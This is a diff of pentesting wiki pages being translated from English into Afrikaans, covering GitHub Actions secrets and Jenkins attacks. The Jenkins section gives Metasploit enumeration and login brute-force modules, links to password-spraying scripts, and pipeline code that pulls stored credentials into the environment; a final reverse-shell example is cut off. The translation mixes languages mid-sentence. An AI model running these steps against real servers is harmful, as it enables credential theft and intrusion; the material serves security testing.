+- Die GitHub App moet **verbinde met 'n persoonlike rekening of 'n organisasie**. +- Jy kan jou eie Github toepassing in [https://github.com/settings/apps](https://github.com/settings/apps) skep. +- Jy kan al die **Github toepassings wat toegang tot jou rekening het** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) sien. +- Dit is die **API Eindpunte vir Github Toepassings** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Afhangende van die toestemmings van die App sal dit in staat wees om sommige van hulle te benader. +- Jy kan geĂŻnstalleerde apps in 'n **organisasie** in _https://github.com/organizations/\/settings/installations_ sien. -Some security recommendations: +Sommige sekuriteitsaanbevelings: -- A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)." -- Make sure the GitHub App integrates with **specific repositories**. -- The GitHub App should **connect to a personal account or an organisation**. -- Don't expect the GitHub App to know and do everything a user can. -- **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things. 
-- Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do. -- If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)." -- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps). +- 'n GitHub App moet **aksies onafhanklik van 'n gebruiker neem** (tenzij die app 'n [gebruiker-naar-bediener](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token gebruik). Om gebruiker-naar-bediener toegangstokens veiliger te hou, kan jy toegangstokens gebruik wat na 8 uur verval, en 'n verfrissingstoken wat vir 'n nuwe toegangstoken omgeruil kan word. Vir meer inligting, sien "[Verfrissing van gebruiker-naar-bediener toegangstokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)." +- Maak seker dat die GitHub App integreer met **spesifieke repositories**. +- Die GitHub App moet **verbinde met 'n persoonlike rekening of 'n organisasie**. +- Moet nie verwag dat die GitHub App alles weet en doen wat 'n gebruiker kan nie. +- **Moet nie 'n GitHub App gebruik as jy net 'n "Aanmeld met GitHub" diens nodig het nie**. Maar 'n GitHub App kan 'n [gebruiker identifikasievloei](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) gebruik om gebruikers in te teken _en_ ander dinge te doen. +- Moet nie 'n GitHub App bou as jy _net_ wil optree as 'n GitHub gebruiker en alles wil doen wat daardie gebruiker kan doen nie. 
+- As jy jou app met GitHub Actions gebruik en workflow lĂȘers wil wysig, moet jy namens die gebruiker verifieer met 'n OAuth token wat die `workflow` skop insluit. Die gebruiker moet admin of skryftoestemming hĂȘ tot die repository wat die workflow lĂȘer bevat. Vir meer inligting, sien "[Begrip van skoppe vir OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)." +- **Meer** in [hier](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps). ### Github Actions -This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information. +Dit **is nie 'n manier om in github te verifieer nie**, maar 'n **kwaadwillige** Github Action kan **ongemagtigde toegang tot github** verkry en **afhangende** van die **privileges** wat aan die Aksie gegee word, kan verskeie **verskillende aanvalle** uitgevoer word. Sien hieronder vir meer inligting. -## Git Actions +## Git Aksies -Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets). +Git aksies laat toe om die **uitvoering van kode te outomatiseer wanneer 'n gebeurtenis plaasvind**. Gewoonlik is die kode wat uitgevoer word **op een of ander manier verwant aan die kode van die repository** (miskien 'n docker houer bou of kyk of die PR nie geheime bevat nie). -### Configuration +### Konfigurasie -In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization. 
+In _https://github.com/organizations/\/settings/actions_ is dit moontlik om die **konfigurasie van die github aksies** vir die organisasie te kontroleer. -It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions. +Dit is moontlik om die gebruik van github aksies heeltemal te verbied, **alle github aksies toe te laat**, of net sekere aksies toe te laat. -It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB_TOKEN** of a Github Action when it's run. +Dit is ook moontlik om te konfigureer **wie goedkeuring nodig het om 'n Github Aksie te laat loop** en die **toestemmings van die GITHUB_TOKEN** van 'n Github Aksie wanneer dit uitgevoer word. -### Git Secrets +### Git Geheime -Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**. - -These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like: +Github Aksie benodig gewoonlik 'n soort geheime om met github of derdeparty toepassings te kommunikeer. Om te **verhoed dat hulle in duidelike teks** in die repo geplaas word, laat github toe om hulle as **Geheime** te plaas. +Hierdie geheime kan **vir die repo of vir die hele organisasie** geconfigureer word. 
Dan, om die **Aksie toegang tot die geheim te gee**, moet jy dit soos volg verklaar: ```yaml steps: - - name: Hello world action - with: # Set the secret as an input - super_secret:${{ secrets.SuperSecret }} - env: # Or as an environment variable - super_secret:${{ secrets.SuperSecret }} +- name: Hello world action +with: # Set the secret as an input +super_secret:${{ secrets.SuperSecret }} +env: # Or as an environment variable +super_secret:${{ secrets.SuperSecret }} ``` - -#### Example using Bash - +#### Voorbeeld met Bash ```yaml steps: - - shell: bash - env: SUPER_SECRET:${{ secrets.SuperSecret }} - run: | - example-command "$SUPER_SECRET" +- shell: bash +env: SUPER_SECRET:${{ secrets.SuperSecret }} +run: | +example-command "$SUPER_SECRET" ``` - > [!WARNING] -> Secrets **can only be accessed from the Github Actions** that have them declared. +> Geheimnisse **kan slegs vanaf die Github Actions** wat hulle verklaar het, toeganklik wees. -> Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**. +> Sodra dit in die repo of die organisasies gekonfigureer is, **sal gebruikers van github nie weer toegang tot hulle hĂȘ nie**, hulle sal net in staat wees om **hulle te verander**. -Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action). +Daarom is die **enigste manier om github geheimnisse te steel, om toegang te hĂȘ tot die masjien wat die Github Action uitvoer** (in daardie scenario sal jy slegs toegang hĂȘ tot die geheimnisse wat vir die Action verklaar is). -### Git Environments - -Github allows to create **environments** where you can save **secrets**. 
Then, you can give the github action access to the secrets inside the environment with something like: +### Git Omgewings +Github laat toe om **omgewings** te skep waar jy **geheimnisse** kan stoor. Dan kan jy die github action toegang gee tot die geheimnisse binne die omgewing met iets soos: ```yaml jobs: - deployment: - runs-on: ubuntu-latest - environment: env_name +deployment: +runs-on: ubuntu-latest +environment: env_name ``` - -You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\ -It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed. +You can configure an environment to be **accessed** by **alle takke** (default), **slegs beskermde** takke of **spesifiseer** watter takke toegang kan hĂȘ.\ +Dit kan ook 'n **aantal vereiste hersienings** stel voordat **uitvoering** van 'n **aksie** met 'n **omgewing** plaasvind of **wag** vir 'n **tyd** voordat ontplooiings voortgaan. ### Git Action Runner -A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user. +A Github Action can be **executed inside the github environment** or can be executed in a **derdeparty-infrastruktuur** geconfigureer deur die gebruiker. -Several organizations will allow to run Github Actions in a **third party infrastructure** as it use to be **cheaper**. +Verskeie organisasies sal toelaat dat Github Actions in 'n **derdeparty-infrastruktuur** gedraai word, aangesien dit gewoonlik **goedkoper** is. You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\/settings/actions/runners_ 
@@ -214,7 +208,7 @@ If all actions (or a malicious action) are allowed a user could use a **Github a > A **malicious Github Action** run could be **abused** by the attacker to: > > - **Steal all the secrets** the Action has access to -> - **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service) +> - **Move laterally** if the Action is executed inside a **derdeparty-infrastruktuur** waar die SA-token wat gebruik word om die masjien te laat loop, toegang kan verkry (waarskynlik via die metadata-diens) > - **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**. ## Branch Protections 
@@ -229,11 +223,11 @@ The **branch protections of a repository** can be found in _https://github.com/\ Different protections can be applied to a branch (like to master): - You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place: - - **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly. - - **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it. - - **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it) - - **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews. - - **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions. +- **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly. +- **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it. +- **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it) +- **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews. +- **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions. - **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret). - **Require conversation resolution before merging**. 
All comments on the code needs to be resolved before the PR can be merged. - **Require signed commits**. The commits need to be signed. @@ -253,7 +247,3 @@ Different protections can be applied to a branch (like to master): - [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/README.md b/src/pentesting-ci-cd/jenkins-security/README.md index 4dfba3ff3..95a338beb 100644 --- a/src/pentesting-ci-cd/jenkins-security/README.md +++ b/src/pentesting-ci-cd/jenkins-security/README.md 
@@ -2,29 +2,25 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually. +Jenkins is 'n hulpmiddel wat 'n eenvoudige metode bied om 'n **deurlopende integrasie** of **deurlopende aflewering** (CI/CD) omgewing vir byna **enige** kombinasie van **programmering tale** en bronkode-repositories te vestig met behulp van pipelines. Boonop outomatiseer dit verskeie roetine ontwikkelings take. Terwyl Jenkins nie die **noodsaaklikheid om skripte vir individuele stappe te skep** verwyder nie, bied dit 'n vinniger en meer robuuste manier om die hele reeks van bou-, toets- en ontplooiing gereedskap te integreer as wat 'n mens maklik handmatig kan opstel. 
{{#ref}} basic-jenkins-information.md {{#endref}} -## Unauthenticated Enumeration - -In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use: +## Ongeoutentiseerde Enumerasie +Om te soek na interessante Jenkins-bladsye sonder outentisering soos (_/people_ of _/asynchPeople_, dit lys die huidige gebruikers) kan jy gebruik maak van: ``` msf> use auxiliary/scanner/http/jenkins_enum ``` - -Check if you can execute commands without needing authentication: - +Kontroleer of jy opdragte kan uitvoer sonder om te hoef te autentiseer: ``` msf> use auxiliary/scanner/http/jenkins_command ``` - -Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**. +Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **gebruikersname**. You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_ @@ -38,7 +34,7 @@ https://github.com/gquere/pwn_jenkins ## Login -In the basic information you can check **all the ways to login inside Jenkins**: +In the basic information you can check **alle maniere om in Jenkins aan te meld**: {{#ref}} basic-jenkins-information.md 
@@ -46,267 +42,251 @@ basic-jenkins-information.md ### Register -You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.** +You will be able to find Jenkins instances that **toelaat dat jy 'n rekening skep en daarin aanmeld. So eenvoudig soos dit.** ### **SSO Login** -Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/). +Also if **SSO** **funksionaliteit**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/). ### Bruteforce -**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**. - +**Jenkins** lacks **wagwoordbeleid** and **gebruikersnaam bruteforce mitigering**. It's essential to **brute-force** users since **swak wagwoorde** or **gebruikersname as wagwoorde** may be in use, even **omgekeerde gebruikersname as wagwoorde**. ``` msf> use auxiliary/scanner/http/jenkins_login ``` +### Wachtwoord spuit -### Password spraying +Gebruik [hierdie python skrip](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) of [hierdie powershell skrip](https://github.com/chryzsh/JenkinsPasswordSpray). -Use [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray). 
+### IP Witlys Bypass -### IP Whitelisting Bypass +Baie organisasies kombineer **SaaS-gebaseerde bronbeheer (SCM) stelsels** soos GitHub of GitLab met 'n **interne, self-gehoste CI** oplossing soos Jenkins of TeamCity. Hierdie opstelling laat CI stelsels toe om **webhook-gebeurtenisse van SaaS bronbeheer verskaffers** te ontvang, hoofsaaklik om pyplyn take te aktiveer. -Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs. +Om dit te bereik, **witlys** organisasies die **IP reekse** van die **SCM platforms**, wat hulle toelaat om toegang te verkry tot die **interne CI stelsel** via **webhooks**. Dit is egter belangrik om te noem dat **enigeen** 'n **rekening** op GitHub of GitLab kan skep en dit kan konfigureer om 'n **webhook** te aktiveer, wat moontlik versoeke na die **interne CI stelsel** kan stuur. -To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**. 
+Kontroleer: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/) -Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/) +## Interne Jenkins Misbruik -## Internal Jenkins Abuses - -In these scenarios we are going to suppose you have a valid account to access Jenkins. +In hierdie scenario's gaan ons aanvaar dat jy 'n geldige rekening het om toegang tot Jenkins te verkry. > [!WARNING] -> Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.** +> Afhangende van die **Magtigings** meganisme wat in Jenkins geconfigureer is en die toestemming van die gecompromitteerde gebruiker, **kan jy dalk of dalk nie die volgende aanvalle uitvoer nie.** -For more information check the basic information: +Vir meer inligting, kyk na die basiese inligting: {{#ref}} basic-jenkins-information.md {{#endref}} -### Listing users +### Lys van gebruikers -If you have accessed Jenkins you can list other registered users in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/) +As jy toegang tot Jenkins verkry het, kan jy ander geregistreerde gebruikers lys in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/) -### Dumping builds to find cleartext secrets - -Use [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets. 
+### Dumping boue om duidelike teks geheime te vind +Gebruik [hierdie skrip](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) om bou konsoluitvoer en bou omgewingsveranderlikes te dump om hopelik duidelike teks geheime te vind. ```bash python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps cd build_dumps gitleaks detect --no-git -v ``` +### **Steling van SSH Kredensiale** -### **Stealing SSH Credentials** - -If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key: +As die gecompromitteerde gebruiker **genoeg bevoegdhede het om 'n nuwe Jenkins node te skep/wysig** en SSH kredensiale reeds gestoor is om toegang tot ander nodes te verkry, kan hy **daardie kredensiale steel** deur 'n node te skep/wysig en **'n gasheer in te stel wat die kredensiale sal opneem** sonder om die gasheer sleutel te verifieer: ![](<../../images/image (218).png>) -You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](./#dumping-secrets). +Jy sal gewoonlik Jenkins ssh kredensiale in 'n **globale verskaffer** (`/credentials/`) vind, so jy kan dit ook dump soos jy enige ander geheim sou dump. Meer inligting in die [**Dumping secrets section**](./#dumping-secrets). ### **RCE in Jenkins** -Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**. 
+Om 'n **shell in die Jenkins bediener** te kry, gee die aanvaller die geleentheid om al die **geheime** en **omgewing veranderlikes** te lek en om **ander masjiene** in dieselfde netwerk te **ontgin** of selfs **cloud kredensiale** te **versamel**. -By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**. +Standaard sal Jenkins **as SYSTEM loop**. Dus, om dit te kompromitteer sal die aanvaller **SYSTEM bevoegdhede** gee. -### **RCE Creating/Modifying a project** +### **RCE Skep/Wysig 'n projek** -Creating/Modifying a project is a way to obtain RCE over the Jenkins server: +Skep/Wysig 'n projek is 'n manier om RCE oor die Jenkins bediener te verkry: {{#ref}} jenkins-rce-creating-modifying-project.md {{#endref}} -### **RCE Execute Groovy script** +### **RCE Voer Groovy skrip uit** -You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project: +Jy kan ook RCE verkry deur 'n Groovy skrip uit te voer, wat dalk minder opmerksaam is as om 'n nuwe projek te skep: {{#ref}} jenkins-rce-with-groovy-script.md {{#endref}} -### RCE Creating/Modifying Pipeline +### RCE Skep/Wysig Pipeline -You can also get **RCE by creating/modifying a pipeline**: +Jy kan ook **RCE verkry deur 'n pipeline te skep/wysig**: {{#ref}} jenkins-rce-creating-modifying-pipeline.md {{#endref}} -## Pipeline Exploitation +## Pipeline Exploitatie -To exploit pipelines you still need to have access to Jenkins. +Om pipelines te ontgin moet jy steeds toegang tot Jenkins hĂȘ. -### Build Pipelines +### Bou Pipelines -**Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used: +**Pipelines** kan ook as **bou meganisme in projekte** gebruik word, in daardie geval kan dit geconfigureer word met 'n **lĂȘer binne die repository** wat die pipeline sintaksis sal bevat. 
Standaard word `/Jenkinsfile` gebruik: ![](<../../images/image (127).png>) -It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access. +Dit is ook moontlik om **pipeline konfigurasielĂȘers in ander plekke** te stoor (in ander repositories byvoorbeeld) met die doel om **toegang** tot die repository en die pipeline toegang te **skei**. -If an attacker have **write access over that file** he will be able to **modify** it and **potentially trigger** the pipeline without even having access to Jenkins.\ -It's possible that the attacker will need to **bypass some branch protections** (depending on the platform and the user privileges they could be bypassed or not). +As 'n aanvaller **skrywe toegang oor daardie lĂȘer het**, sal hy in staat wees om dit te **wysig** en **potensieel die pipeline te aktiveer** sonder om toegang tot Jenkins te hĂȘ.\ +Dit is moontlik dat die aanvaller sal moet **omseil sommige tak beskermings** (afhangende van die platform en die gebruiker bevoegdhede kan dit omseil of nie). -The most common triggers to execute a custom pipeline are: +Die mees algemene triggers om 'n pasgemaakte pipeline uit te voer is: -- **Pull request** to the main branch (or potentially to other branches) -- **Push to the main branch** (or potentially to other branches) -- **Update the main branch** and wait until it's executed somehow +- **Trekversoek** na die hoof tak (of potensieel na ander takke) +- **Stoot na die hoof tak** (of potensieel na ander takke) +- **Opdateer die hoof tak** en wag totdat dit op een of ander manier uitgevoer word > [!NOTE] -> If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**. 
+> As jy 'n **eksterne gebruiker** is, moet jy nie verwag om 'n **PR na die hoof tak** van die repo van **ander gebruiker/organisasie** te skep en **die pipeline te aktiveer** nie... maar as dit **sleg geconfigureer** is, kan jy heeltemal **maatskappye kompromitteer net deur dit te ontgin**. ### Pipeline RCE -In the previous RCE section it was already indicated a technique to [**get RCE modifying a pipeline**](./#rce-creating-modifying-pipeline). +In die vorige RCE afdeling is daar reeds 'n tegniek aangedui om [**RCE te verkry deur 'n pipeline te wysig**](./#rce-creating-modifying-pipeline). -### Checking Env variables - -It's possible to declare **clear text env variables** for the whole pipeline or for specific stages. This env variables **shouldn't contain sensitive info**, but and attacker could always **check all the pipeline** configurations/Jenkinsfiles: +### Kontroleer Omgewing veranderlikes +Dit is moontlik om **duidelike teks omgewing veranderlikes** vir die hele pipeline of vir spesifieke fases te verklaar. Hierdie omgewing veranderlikes **moet nie sensitiewe inligting bevat nie**, maar 'n aanvaller kan altyd **alle pipeline** konfigurasies/Jenkinsfiles nagaan: ```bash pipeline { - agent {label 'built-in'} - environment { - GENERIC_ENV_VAR = "Test pipeline ENV variables." - } +agent {label 'built-in'} +environment { +GENERIC_ENV_VAR = "Test pipeline ENV variables." +} - stages { - stage("Build") { - environment { - STAGE_ENV_VAR = "Test stage ENV variables." - } - steps { +stages { +stage("Build") { +environment { +STAGE_ENV_VAR = "Test stage ENV variables." +} +steps { ``` - ### Dumping secrets -For information about how are secrets usually treated by Jenkins check out the basic information: +Vir inligting oor hoe sekrete gewoonlik deur Jenkins hanteer word, kyk na die basiese inligting: {{#ref}} basic-jenkins-information.md {{#endref}} -Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job//configure`). 
Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines. - -There is another problem, in order to get a **secret inside the env** of a pipeline you need to **know the name and type of the secret**. For example, you try lo **load** a **`usernamePassword`** **secret** as a **`string`** **secret** you will get this **error**: +Geloofsbriewe kan **geskik word aan globale verskaffers** (`/credentials/`) of aan **spesifieke projekte** (`/job//configure`). Daarom, om al hierdie te exfiltrate, moet jy **ten minste al die projekte** wat sekrete bevat, **kompromitteer** en pasgemaakte/vergiftigde pyplyne uitvoer. +Daar is 'n ander probleem, om 'n **geheim binne die omgewing** van 'n pyplyn te kry, moet jy **die naam en tipe van die geheim** **ken**. Byvoorbeeld, as jy probeer om 'n **`usernamePassword`** **geheim** as 'n **`string`** **geheim** te **laai**, sal jy hierdie **fout** kry: ``` ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected ``` - -Here you have the way to load some common secret types: - +Hier is die manier om 'n paar algemene geheime tipes te laai: ```bash withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) { - sh ''' - env #Search for USERNAME and PASS - ''' +sh ''' +env #Search for USERNAME and PASS +''' } withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) { - sh ''' - env #Search for SECRET - ''' +sh ''' +env #Search for SECRET +''' } withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) { - sh ''' - env # Search for USERPASS - ''' +sh ''' +env # Search for USERPASS +''' } # You can also load multiple env variables at once withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'), - 
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) { - sh ''' - env - ''' +string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) { +sh ''' +env +''' } ``` - -At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/) +Aan die einde van hierdie bladsy kan jy **alle tipe geloofsbewyse** **vind**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/) > [!WARNING] -> The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\ -> More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation). +> Die beste manier om **alle die geheime op een slag** te **dump** is deur die **Jenkins** masjien te **kompromitteer** (byvoorbeeld deur 'n omgekeerde skulp in die **ingeboude node** te laat loop) en dan die **master sleutels** en die **geĂ«nkripteerde geheime** te **lek** en dit offline te ontsleutel.\ +> Meer oor hoe om dit te doen in die [Nodes & Agents section](./#nodes-and-agents) en in die [Post Exploitation section](./#post-exploitation). ### Triggers -From [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): The `triggers` directive defines the **automated ways in which the Pipeline should be re-triggered**. For Pipelines which are integrated with a source such as GitHub or BitBucket, `triggers` may not be necessary as webhooks-based integration will likely already be present. The triggers currently available are `cron`, `pollSCM` and `upstream`. 
- -Cron example: +Van [die dokumentasie](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): Die `triggers` riglyn definieer die **geoutomatiseerde maniere waarop die Pipeline weer geaktiveer moet word**. Vir Pipelines wat geĂŻntegreer is met 'n bron soos GitHub of BitBucket, mag `triggers` nie nodig wees nie, aangesien webhooks-gebaseerde integrasie waarskynlik reeds teenwoordig sal wees. Die huidige beskikbare triggers is `cron`, `pollSCM` en `upstream`. +Cron voorbeeld: ```bash triggers { cron('H */4 * * 1-5') } ``` +Kontroleer **ander voorbeelde in die dokumentasie**. -Check **other examples in the docs**. +### Knoop & Agente -### Nodes & Agents +'n **Jenkins-instansie** mag **verskillende agente op verskillende masjiene hĂȘ**. Vanuit 'n aanvaller se perspektief beteken toegang tot verskillende masjiene **verskillende potensiĂ«le wolkakkredite** om te steel of **verskillende netwerktoegang** wat misbruik kan word om ander masjiene te ontgin. -A **Jenkins instance** might have **different agents running in different machines**. From an attacker perspective, access to different machines means **different potential cloud credentials** to steal or **different network access** that could be abuse to exploit other machines. - -For more information check the basic information: +Vir meer inligting, kyk na die basiese inligting: {{#ref}} basic-jenkins-information.md {{#endref}} -You can enumerate the **configured nodes** in `/computer/`, you will usually find the \*\*`Built-In Node` \*\* (which is the node running Jenkins) and potentially more: +Jy kan die **gekonfigureerde knope** in `/computer/` opnoem, jy sal gewoonlik die \*\*`Built-In Node` \*\* (wat die knoop is wat Jenkins uitvoer) en moontlik meer vind: ![](<../../images/image (249).png>) -It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information. 
- -To indicate you want to **run** the **pipeline** in the **built-in Jenkins node** you can specify inside the pipeline the following config: +Dit is **spesiaal interessant om die Built-In knoop te kompromitteer** omdat dit sensitiewe Jenkins-inligting bevat. +Om aan te dui dat jy die **pipeline** in die **ingeboude Jenkins-knoop** wil **uitvoer**, kan jy die volgende konfigurasie binne die pipeline spesifiseer: ```bash pipeline { - agent {label 'built-in'} +agent {label 'built-in'} ``` +### Volledige voorbeeld -### Complete example - -Pipeline in an specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell: - +Pypeline in 'n spesifieke agent, met 'n cron-trig, met pypeline en fase omgewingsveranderlikes, wat 2 veranderlikes in 'n stap laai en 'n omgekeerde shell stuur: ```bash pipeline { - agent {label 'built-in'} - triggers { cron('H */4 * * 1-5') } - environment { - GENERIC_ENV_VAR = "Test pipeline ENV variables." - } +agent {label 'built-in'} +triggers { cron('H */4 * * 1-5') } +environment { +GENERIC_ENV_VAR = "Test pipeline ENV variables." +} - stages { - stage("Build") { - environment { - STAGE_ENV_VAR = "Test stage ENV variables." - } - steps { - withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'), - string(credentialsId: 'slack-url',variable: 